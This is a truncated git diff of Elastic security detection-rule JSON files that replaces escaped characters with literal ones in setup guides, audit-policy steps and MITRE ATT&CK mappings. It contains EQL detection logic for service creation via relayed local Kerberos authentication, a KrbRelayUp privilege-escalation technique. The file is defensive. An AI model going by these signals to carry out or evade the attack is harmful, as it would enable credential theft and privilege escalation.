guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json index 54c7b3b59b1..61207d65f48 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json index 09a89f0be91..49d8b4bff16 100644 --- a/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json index 694c9d9c828..80194f4d94d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json index a89d31eb1a6..fb96830e6b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json index fdca0c22de8..7793e4f0601 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json index 6221bf310b2..19d4c13f1e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json index ea581bc2979..73a568a73e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json index 6bc26bff41d..84f32ca34e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Creation via Local Kerberos Authentication", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where host.os.type == \"windows\" and\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port \u003e 0] by winlog.event_data.TargetLogonId\n\n [any where host.os.type == \"windows\" and\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where host.os.type == \"windows\" and\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where host.os.type == \"windows\" and\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json index 6bbe8d49219..d31b47f7624 100644 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Creation via Local Kerberos Authentication", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port \u003e 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json index c2019857012..83b572f6b20 100644 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Creation via Local Kerberos Authentication", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port \u003e 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json index 3e5b97252a2..e566aa96ab9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json index 79faeb90e1d..c29db94ea4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json index 24995442e7a..c1a6b6f4ed6 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json index 147978613b7..5b0e40b303e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json index ba084babba1..1bf088d7b5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```\n", + "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json index b05b82bd59c..234b1f544e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json +++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json index ed4279308da..57b9ea9c432 100644 --- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json +++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json index 1b1626b9fa8..653f65e794f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json index 245857aa0b2..753dbf476c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json index 40e91e370f9..110769158ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git 